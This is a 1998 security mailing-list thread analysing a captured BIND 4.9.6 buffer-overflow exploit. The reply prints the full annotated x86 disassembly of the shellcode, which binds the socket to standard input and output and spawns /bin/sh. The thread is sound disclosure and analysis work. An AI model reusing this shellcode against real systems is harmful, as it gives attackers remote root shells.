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Bind 4.9.6 ~ Current | X86 Exploit

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Date: Wed, 17 Jun 1998 14:24:16 +0200
From: Sebastian Schoenberg <schoenbg@OS.INF.TU-DRESDEN.DE>
Subject: Re: Bind 4.9.6 ~ Current | X86 Exploit

I disassembled the packets and as you can see below, thats code to
execute  /bin/sh.


# objdump  -lD -b binary --start=0x1fb7  --architecture=i386 scanme2 | less

scanme2:     file format binary

No symbols in "scanme2".
Disassembly of section .data:

00001fb7 <.data+0x1fb7>:

; Duplicate descriptor 4 to stdin (which is probably the socket)
.... lots of nops deleted

    1fb7:       31 c0           xorl   %eax,%eax
    1fb9:       b0 3f           movb   $0x3f,%al
    1fbb:       31 db           xorl   %ebx,%ebx
    1fbd:       b3 04           movb   $0x4,%bl
    1fbf:       31 c9           xorl   %ecx,%ecx
    1fc1:       cd 80           int    $0x80
; Dup stdout too

    1fc3:       31 c0           xorl   %eax,%eax
    1fc5:       b0 3f           movb   $0x3f,%al
    1fc7:       b1 01           movb   $0x1,%cl
    1fc9:       cd 80           int    $0x80
    1fcb:       31 c0           xorl   %eax,%eax
    1fcd:       b0 3f           movb   $0x3f,%al
    1fcf:       b1 02           movb   $0x2,%cl
    1fd1:       cd 80           int    $0x80
    1fd3:       eb 24           jmp    0x1ff9
; jmp and call returns here, so esi is address of '/bin/sh'

    1fd5:       5e              popl   %esi
    1fd6:       8d 1e           leal   (%esi),%ebx
    1fd8:       89 5e 0b        movl   %ebx,0xb(%esi)
    1fdb:       33 d2           xorl   %edx,%edx
    1fdd:       89 56 07        movl   %edx,0x7(%esi)
    1fe0:       89 56 0f        movl   %edx,0xf(%esi)
    1fe3:       b8 1b 56 34 12  movl   $0x1234561b,%eax
    1fe8:       35 10 56 34 12  xorl   $0x12345610,%eax
; eax is 0x0b which is ecexve, starts /bin/sh

    1fed:       8d 4e 0b        leal   0xb(%esi),%ecx
    1ff0:       8b d1           movl   %ecx,%edx
    1ff2:       cd 80           int    $0x80

; do exit if fail
    1ff4:       33 c0           xorl   %eax,%eax
    1ff6:       40              incl   %eax
    1ff7:       cd 80           int    $0x80
    1ff9:       e8 d7 ff ff ff  call   0x1fd5

; this here is '/' as string
    1ffe:       2f              das
    1fff:       62 69 6e        boundl 0x6e(%ecx),%ebp
    2002:       2f              das
    2003:       73 68           jae    0x206d
    2005:       00 90 90 90 90  addb   %dl,0x90909090(%eax)

; and lots of nops....

-----Original Message-----
From:   System Administrator [SMTP:root@303.ORG]
Sent:   Wednesday, June 17, 1998 12:10 AM
Subject:        Bind 4.9.6 ~ Current | X86 Exploit

My apologies if this problem is already known.

The attached file is a tcpdump written out, of a person i know, testing
a new exploit for bind on me. To read this file and make any sense of it:

tcpdump -vvxr scanme2

It would appear to be another buffer overflow, and triggering it with
sending mass "9090" to something. We are looking further into this, but do
not yet have a exploit for it, but are a bit more concearned with a patch.
It looks like it was spawned off the idea of the inverse query exploit.

Also, at first look it appears the problem probally originates in
ns_resp.c, under the /named directory in source. And the code I sent
happens to corrupt the stack by adding "909090909090~" on the end of
packets, corrupting the stack, crashing named, after leaving a root shell.

It is also rumored that there are two version of this exploit already out,
one a bit more public than the other, this one was the unreleased, not
very public version.

*side note*
Ive definetly got some of this wrong, but any information would be very
helpfull on it.


System Administrator

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